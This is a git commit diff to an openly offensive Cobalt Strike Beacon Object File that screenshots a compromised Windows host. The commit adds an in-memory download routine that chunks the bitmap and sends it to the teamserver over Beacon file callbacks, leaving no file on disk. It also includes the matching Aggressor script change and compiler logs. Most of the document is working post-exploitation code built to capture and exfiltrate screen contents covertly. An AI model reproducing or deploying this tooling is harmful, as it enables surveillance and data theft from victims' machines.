in memory download

This commit is contained in:
CodeXTF2 2022-10-26 00:28:47 +08:00
parent 6b2ddb5bc9
commit d082e142a9
11 changed files with 165 additions and 14 deletions

View File

@ -5,7 +5,138 @@
#pragma comment(lib, "User32.lib") #pragma comment(lib, "User32.lib")
#pragma comment(lib, "Gdi32.lib") #pragma comment(lib, "Gdi32.lib")
char downloadfilename[] = "screenshot.bmp";
/*Download File*/
void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) {
//Intializes random number generator to create fileId
time_t t;
MSVCRT$srand((unsigned)MSVCRT$time(&t));
int fileId = MSVCRT$rand();
//8 bytes for fileId and fileSize
int messageLength = downloadFileNameLength + 8;
char* packedData = (char*)MSVCRT$malloc(messageLength);
//pack on fileId as 4-byte int first
packedData[0] = (fileId >> 24) & 0xFF;
packedData[1] = (fileId >> 16) & 0xFF;
packedData[2] = (fileId >> 8) & 0xFF;
packedData[3] = fileId & 0xFF;
//pack on fileSize as 4-byte int second
packedData[4] = (fileSize >> 24) & 0xFF;
packedData[5] = (fileSize >> 16) & 0xFF;
packedData[6] = (fileSize >> 8) & 0xFF;
packedData[7] = fileSize & 0xFF;
int packedIndex = 8;
//pack on the file name last
for (int i = 0; i < downloadFileNameLength; i++) {
packedData[packedIndex] = fileName[i];
packedIndex++;
}
BeaconOutput(CALLBACK_FILE, packedData, messageLength);
if (fileSize > (1024 * 900)) {
//Lets see how many times this constant goes into our file size, then add one (because if it doesn't go in at all, we still have one chunk)
int numOfChunks = (fileSize / (1024 * 900)) + 1;
int index = 0;
int chunkSize = 1024 * 900;
while (index < fileSize) {
if (fileSize - index > chunkSize) {//We have plenty of room, grab the chunk and move on
/*First 4 are the fileId
then account for length of file
then a byte for the good-measure null byte to be included
then lastly is the 4-byte int of the fileSize*/
int chunkLength = 4 + chunkSize;
char* packedChunk = (char*)MSVCRT$malloc(chunkLength);
//pack on fileId as 4-byte int first
packedChunk[0] = (fileId >> 24) & 0xFF;
packedChunk[1] = (fileId >> 16) & 0xFF;
packedChunk[2] = (fileId >> 8) & 0xFF;
packedChunk[3] = fileId & 0xFF;
int chunkIndex = 4;
//pack on the file name last
for (int i = index; i < index + chunkSize; i++) {
packedChunk[chunkIndex] = returnData[i];
chunkIndex++;
}
BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength);
}
else {//This chunk is smaller than the chunkSize, so we have to be careful with our measurements
int lastChunkLength = fileSize - index + 4;
char* lastChunk = (char*)MSVCRT$malloc(lastChunkLength);
//pack on fileId as 4-byte int first
lastChunk[0] = (fileId >> 24) & 0xFF;
lastChunk[1] = (fileId >> 16) & 0xFF;
lastChunk[2] = (fileId >> 8) & 0xFF;
lastChunk[3] = fileId & 0xFF;
int lastChunkIndex = 4;
//pack on the file name last
for (int i = index; i < fileSize; i++) {
lastChunk[lastChunkIndex] = returnData[i];
lastChunkIndex++;
}
BeaconOutput(CALLBACK_FILE_WRITE, lastChunk, lastChunkLength);
}
index = index + chunkSize;
}
}
else {
/*first 4 are the fileId
then account for length of file
then a byte for the good-measure null byte to be included
then lastly is the 4-byte int of the fileSize*/
int chunkLength = 4 + fileSize;
char* packedChunk = (char*)MSVCRT$malloc(chunkLength);
//pack on fileId as 4-byte int first
packedChunk[0] = (fileId >> 24) & 0xFF;
packedChunk[1] = (fileId >> 16) & 0xFF;
packedChunk[2] = (fileId >> 8) & 0xFF;
packedChunk[3] = fileId & 0xFF;
int chunkIndex = 4;
//pack on the file name last
for (int i = 0; i < fileSize; i++) {
packedChunk[chunkIndex] = returnData[i];
chunkIndex++;
}
BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength);
}
//We need to tell the teamserver that we are done writing to this fileId
char packedClose[4];
//pack on fileId as 4-byte int first
packedClose[0] = (fileId >> 24) & 0xFF;
packedClose[1] = (fileId >> 16) & 0xFF;
packedClose[2] = (fileId >> 8) & 0xFF;
packedClose[3] = fileId & 0xFF;
BeaconOutput(CALLBACK_FILE_CLOSE, packedClose, 4);
return;
}
#pragma region error_handling #pragma region error_handling
#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr) #define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
@ -80,11 +211,10 @@ BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName)
ReleaseDC(NULL, hDC); ReleaseDC(NULL, hDC);
} }
fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, //fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);
if (fh == INVALID_HANDLE_VALUE) //if (fh == INVALID_HANDLE_VALUE)
return FALSE; // return FALSE;
bmfHdr.bfType = 0x4D42; // "BM" bmfHdr.bfType = 0x4D42; // "BM"
dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize; dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize;
@ -92,19 +222,28 @@ BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName)
bmfHdr.bfReserved1 = 0; bmfHdr.bfReserved1 = 0;
bmfHdr.bfReserved2 = 0; bmfHdr.bfReserved2 = 0;
bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize; bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize;
void* bmpdata = malloc(sizeof(BITMAPFILEHEADER) + dwDIBSize);
memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER));
memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize);
WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL);
WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL); downloadFile((char*)lpszFileName, sizeof(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize));
//WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL);
/* clean up */
GlobalUnlock(hDib); GlobalUnlock(hDib);
GlobalFree(hDib); GlobalFree(hDib);
CloseHandle(fh); //CloseHandle(fh);
return TRUE; return TRUE;
} }
#ifdef BOF #ifdef BOF
void go(char* buff, int len) { void go(char* buff, int len) {
BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk"); datap parser;
char * downloadfilename;
BeaconDataParse(&parser, buff, len);
downloadfilename = BeaconDataExtract(&parser, NULL);
BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to %s",downloadfilename);
int x1, y1, x2, y2, w, h; int x1, y1, x2, y2, w, h;
// get screen dimensions // get screen dimensions
x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
@ -132,10 +271,10 @@ void go(char* buff, int len) {
*/ */
BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap..."); BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap...");
LPCSTR filename = "screenshot.bmp"; LPCSTR filename = (LPCSTR)downloadfilename;
SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename); SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename);
BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp"); //BeaconPrintf(0x0, "[+] Printscreen bitmap saved to %s",downloadfilename);
// clean up // clean up
SelectObject(hDC, old_obj); SelectObject(hDC, old_obj);
DeleteDC(hDC); DeleteDC(hDC);

View File

@ -44,6 +44,9 @@ DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value);
#define CALLBACK_OUTPUT_OEM 0x1e #define CALLBACK_OUTPUT_OEM 0x1e
#define CALLBACK_ERROR 0x0d #define CALLBACK_ERROR 0x0d
#define CALLBACK_OUTPUT_UTF8 0x20 #define CALLBACK_OUTPUT_UTF8 0x20
#define CALLBACK_FILE 0x02
#define CALLBACK_FILE_WRITE 0x08
#define CALLBACK_FILE_CLOSE 0x09
DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...);
DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len);

View File

@ -163,6 +163,7 @@ DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SI
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID); DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes);
DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t); DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t);
DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t);
DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t); DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t);
@ -266,6 +267,7 @@ DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetUserNameW(LPWSTR lpBuffer, LPDWORD pcbBu
#define HeapAlloc KERNEL32$HeapAlloc #define HeapAlloc KERNEL32$HeapAlloc
#define HeapReAlloc KERNEL32$HeapReAlloc #define HeapReAlloc KERNEL32$HeapReAlloc
#define memcpy MSVCRT$memcpy #define memcpy MSVCRT$memcpy
#define malloc MSVCRT$malloc
#define memset MSVCRT$memset #define memset MSVCRT$memset

View File

@ -13,8 +13,10 @@ C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\Screens
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition
C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory' C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc'
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj
1 File(s) copied 1 File(s) copied
enumerating sections... enumerating sections...

View File

@ -13,8 +13,10 @@ C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\Screens
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition
C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory' C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc'
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj
1 File(s) copied 1 File(s) copied
enumerating sections... enumerating sections...

Binary file not shown.

Binary file not shown.

View File

@ -11,9 +11,12 @@ alias screenshot_bof {
# figure out the arch of this session # figure out the arch of this session
$barch = barch($1); $barch = barch($1);
# read in the right BOF file # read in the right BOF file
$handle = openf(script_resource("screenshotBOF. $+ $barch $+ .obj")); $handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj"));
$data = readb($handle, -1); $data = readb($handle, -1);
closef($handle); closef($handle);
$args = bof_pack($1, "z",$2);
# announce what we're doing # announce what we're doing
btask($1, "Running screenshot BOF by (@codex_tf2)"); btask($1, "Running screenshot BOF by (@codex_tf2)");
# execute it. # execute it.

Binary file not shown.